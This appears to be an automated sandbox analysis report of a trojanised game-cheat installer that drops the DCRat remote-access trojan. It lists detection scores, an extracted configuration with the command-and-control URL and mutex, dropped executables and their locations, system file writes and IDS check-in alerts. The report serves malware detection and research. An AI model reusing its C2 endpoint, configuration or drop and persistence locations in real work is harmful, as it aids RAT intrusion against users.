                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-CZP27witmtYUEWaffZeU", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Recovery\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Source: C:\Recovery\jnowHpJlZlXal.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Recovery\services.exeReversingLabs: Detection: 83%
                                    Source: C:\Users\user\Desktop\EcfIfcKE.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\MGoyPVal.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\VjwnzPpT.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\VrgGeyQY.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\fSPDjruA.logReversingLabs: Detection: 70%
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeReversingLabs: Detection: 83%
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeReversingLabs: Detection: 83%
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeVirustotal: Detection: 56%Perma Link
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeReversingLabs: Detection: 68%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                                    Source: C:\Recovery\services.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exeJoe Sandbox ML: detected
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exeJoe Sandbox ML: detected
                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-CZP27witmtYUEWaffZeU","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://77777cm.nyashtyan.in/","externalpipejsprocessAuthapiDbtrackWordpressCdn"]]
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Directory created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Directory created: C:\Program Files\Uninstall Information\7ebef5d49c4292
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Directory created: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Directory created: C:\Program Files\7-Zip\Lang\7ebef5d49c4292
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: ;C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CFA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D0C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D1B348 FindFirstFileExA
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File opened: C:\Users\user
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File opened: C:\Users\user\AppData\Local
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File opened: C:\Users\user\AppData
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File opened: C:\Users\user\Desktop\desktop.ini

                                    Software Vulnerabilities

                                    Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49973 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49977 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49971 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49985 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49988 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49980 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49982 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49805 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49987 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49984 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49989 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49990 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49983 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49981 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49986 -> 104.21.32.1:80
                                    Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49979 -> 104.21.32.1:80
                                    Source: powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000026.00000002.1783465174.00000256401EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6836BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F92AF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2EF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B290E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD77C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EC88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB8C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB46A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB78F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 00000026.00000002.1783465174.000002563FE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1753750292.000001D880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1733402114.000001A6833C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1763302374.0000016F928D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1691776577.000002BF80601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1770576287.00000146B2CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.1705344630.000001B980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1697699277.0000014B28EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1733069605.000001B3C4C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1735567184.000001EDD75A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.1761913793.000001DCE6BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1703359712.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.1806998001.000001FA1EA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1757555101.0000024914A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1729234879.000001E34F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1770411015.000001E1DB6A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000043.00000002.1770629189.0000016FBB1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1763311905.000001FFB76D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000047.00000002.1817958201.00000298B7C11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 00000047.00000002.1817958201.00000298B7E37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CF6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CF848E
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CF40FE
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D04088
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D000B7
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D151C9
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D07153
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D062CA
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CF32F7
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D043BF
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D1D440
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CFF461
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CFC426
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D077EF
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D1D8EE
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CF286B
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D219F4
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CFE9B7
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D06CDC
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D03E0B
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CFEFE2
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D14F9A
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Code function: 10_2_00007FFAAC580D48
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Code function: 10_2_00007FFAAC580E43
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: String function: 00D0EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: String function: 00D0F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: String function: 00D0EB78 appears 39 times
                                    Source: vyXTwjuX.log.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: VrgGeyQY.log.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: fSPDjruA.log.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: VjwnzPpT.log.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: MGoyPVal.log.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: EcfIfcKE.log.10.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: BridgePortsurrogateserverref.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: services.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe0.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe1.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: jnowHpJlZlXal.exe2.10.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@90/113@0/0
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00CF6C74 GetLastError,FormatMessageW
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Code function: 0_2_00D0A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\Desktop\VrgGeyQY.log
                                    Source: C:\Recovery\services.exe | Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8316:120:WilError_03
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-CZP27witmtYUEWaffZeU
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_03
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\AppData\Local\Temp\m5fi0urd
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Command line argument: sfxname (0_2_00D0DF1E)
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Command line argument: sfxstime (0_2_00D0DF1E)
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Command line argument: STARTDLG (0_2_00D0DF1E)
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
